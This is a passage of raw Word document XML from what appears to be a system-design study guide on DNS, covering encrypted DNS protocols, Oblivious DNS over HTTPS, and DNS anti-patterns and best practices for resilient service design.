    <w:p w14:paraId="2417FD4A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="814"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Every app you use (apps resolve API domains).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475CD227" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="814"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Every service your IoT devices contact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF70CF1" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="814"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Timing patterns (when you're active, your routines).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B84D2B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>19.2 Encrypted DNS Protocols Summary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20"/>
        <w:gridCol w:w="839"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="3340"/>
        <w:gridCol w:w="1837"/>
      </w:tblGrid>
      <w:tr w:rsidR="006F072B" w:rsidRPr="006F072B" w14:paraId="296F0EA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755FBD" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F072B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Protocol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E6858B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F072B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Port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9DDB99" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F072B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Transport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FE3599" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F072B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Distinguishable?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5B378E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F072B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Standardized</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F072B" w:rsidRPr="006F072B" w14:paraId="287C427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916B11" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>Plain DNS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C53B92" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>53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8B4C6C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>UDP/TCP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FF92CA" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>Yes (cleartext)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AF3B21" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>RFC 1035</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F072B" w:rsidRPr="006F072B" w14:paraId="1A2C76A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0EDB7F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>DoT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07722D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>853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B3F66C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>TLS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017169" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>Yes (dedicated port)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68C3CD" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>RFC 7858</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F072B" w:rsidRPr="006F072B" w14:paraId="3744C05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D09CB7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>DoH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18ED39" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>443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518E41" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>HTTPS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CB38D7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>No (looks like regular HTTPS)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507927" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>RFC 8484</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F072B" w:rsidRPr="006F072B" w14:paraId="7F0EEE8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935DC2" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>DoQ</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80D65C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>853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AC5D11" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>QUIC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7B2041" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>Yes (dedicated port)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91379B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:r w:rsidRPr="006F072B">
              <w:t>RFC 9250</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7AE28EBB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>19.3 Oblivious DNS over HTTPS (ODoH)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608A9158" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The remaining privacy gap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF6CF16" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Even with DoH, the recursive resolver (Google, Cloudflare) sees:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D734AF9" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="815"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Your IP address (source of the query).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0FECF9" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="815"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>The domains you're resolving.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D030757" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>They can build a complete profile of your browsing habits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583D6A3F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ODoH separates identity from query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4721E454" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A414480" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Client → Proxy (sees client IP, NOT the query) → Resolver (sees the query, NOT client IP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EDE879" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="816"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>Client encrypts the DNS query with the resolver's public key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FC3B1B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="816"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Client sends the encrypted query to a PROXY.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587449C8" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="816"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Proxy forwards to the resolver (the proxy can't decrypt — doesn't have the resolver's private key).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003F68BC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="816"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Resolver decrypts, resolves, encrypts the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA19711" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="816"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Proxy forwards response to client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212D2572" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="816"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Client decrypts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C02461A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E483C6B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="817"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Proxy knows WHO (client IP) but not WHAT (encrypted query).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1442C112" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="817"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Resolver knows WHAT (decrypted query) but not WHO (sees proxy IP, not client).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF58E1A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="817"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Neither has the complete picture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A596EFC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:pict w14:anchorId="303445FF">
          <v:rect id="_x0000_i3495" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="040396D6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>20. DNS Anti-Patterns and Best Practices for System Design</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BE48B1" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>20.1 Anti-Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F76393" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="818"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Relying on DNS for fast failover:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> DNS TTL caching makes failover inherently slow (minutes). Use DNS for coarse-grained routing; use load balancers for fast failover.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB3DDDC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="818"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Very low TTLs (&lt; 30 seconds) without need:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Increases query volume, costs more, may not be respected by all resolvers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E532A7E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="818"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Single DNS provider:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> If your one DNS provider has an outage (Dyn 2016 attack — took down Twitter, Reddit, Netflix), your entire service is unreachable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0792216F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="818"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Not pre-lowering TTL before migrations:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> If you change IPs without first lowering TTL, you're stuck waiting out the old high TTL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1943F8" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="818"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Using DNS for real-time load balancing:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> DNS doesn't know about per-connection load. It's a blunt tool compared to an actual load balancer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40512DC0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="818"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CNAME chains (CNAME pointing to CNAME pointing to CNAME):</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Each requires a separate resolution. Three CNAMEs = three extra DNS lookups = 60–200ms added latency on cold cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0555027C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="818"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Forgetting about negative caching:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Creating a new subdomain right after a client queried it (and got NXDOMAIN) — the negative cache entry blocks resolution for the SOA minimum TTL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294CF975" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="818"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Not monitoring DNS resolution time from the client's perspective:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Your authoritative servers may be fast, but if the recursive resolver has issues, your users suffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090AD001" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>20.2 Best Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDA6950" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="819"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use at least 2 nameservers on different networks.</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Preferably 3–4 across different providers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C070FAF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="819"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Set TTL based on your failover requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F17C86" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="819"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Need fast failover: TTL = 60s (accept higher query volume).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C42F341" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="819"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Stable IPs: TTL = 3600s (performance + resilience).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7ABE89" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="819"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Compromise: TTL = 300s (most common for production services).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EC50E8" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="819"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use health-checked DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> for active failover. Route 53, Cloudflare, NS1 all support this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE8A487" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="819"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use ALIAS/ANAME records</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> for apex domains pointing to load balancers or CDNs (avoid the CNAME-at-apex limitation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFCBD7D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="819"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Implement DNSSEC</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> for domains where DNS integrity is critical (financial services, government, infrastructure).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FE345C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="819"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Monitor DNS from multiple global vantage points.</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> A DNS issue in Asia may not be visible from your monitoring in the US.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2B7FFE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="819"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Plan for DNS provider failure.</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Use secondary DNS (cross-provider redundancy).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DA138F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="819"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Separate internal and external DNS.</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Internal services shouldn't be resolvable from the public internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462D1816" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:pict w14:anchorId="606E18C8">
          <v:rect id="_x0000_i3496" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B01D43D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>21. Summary — DNS in the System Design Context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856"/>
        <w:gridCol w:w="6494"/>
      </w:tblGrid>
      <w:tr w:rsidR="006F072B" w:rsidRPr="006F072B" w14:paraId="6EEBDEC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38169B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F072B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
